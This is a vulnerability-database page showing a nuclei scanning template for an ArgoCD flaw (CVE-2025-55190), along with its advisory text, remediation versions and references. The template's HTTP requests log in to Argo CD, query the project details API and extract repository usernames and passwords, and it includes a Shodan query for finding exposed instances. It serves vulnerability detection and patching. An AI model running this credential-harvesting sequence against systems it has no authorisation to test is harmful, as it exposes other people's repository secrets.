Lucene search
K

ArgoCD Project API Token Repository Credentials Exposure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

ArgoCD project get tokens can expose repository credentials via project details API across versions

Related
Refs
Code
id: CVE-2025-55190

info:
  name: ArgoCD Project API Token Repository Credentials Exposure
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
    (usernames, passwords) through the project details API endpoint, even when the token only has standard
    application management permissions and no explicit access to secrets. This vulnerability affects versions
    v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
    and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
  impact: |
    Authenticated attackers with project-level API tokens can retrieve sensitive repository credentials including usernames and passwords without requiring explicit secret access permissions.
  remediation: |
    Upgrade ArgoCD to version 2.13.9, 2.14.16, 3.0.13, 3.1.2, or later depending on your version branch that properly restricts repository credential access.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190
    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-55190
    epss-score: 0.04518
    epss-percentile: 0.90378
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"argo cd"
  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: token
        part: body
        internal: true
        json:
          - '.token'

  - raw:
      - |
        GET /api/v1/projects/default/detailed HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - '"repositories":'
          - '"username":'
          - '"password":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: exposed_credentials
        part: body
        group: 1
        regex:
          - '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4a0a004730450221009cdc99881f201d12c3cc70207618695f31613460afa9065e495916fecb79dd1502200366309e109dba50d9fc1dfe596fa0841acad8ddff9b320d6d624fc86bfe2f0e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.9
EPSS0.04518
SSVC
35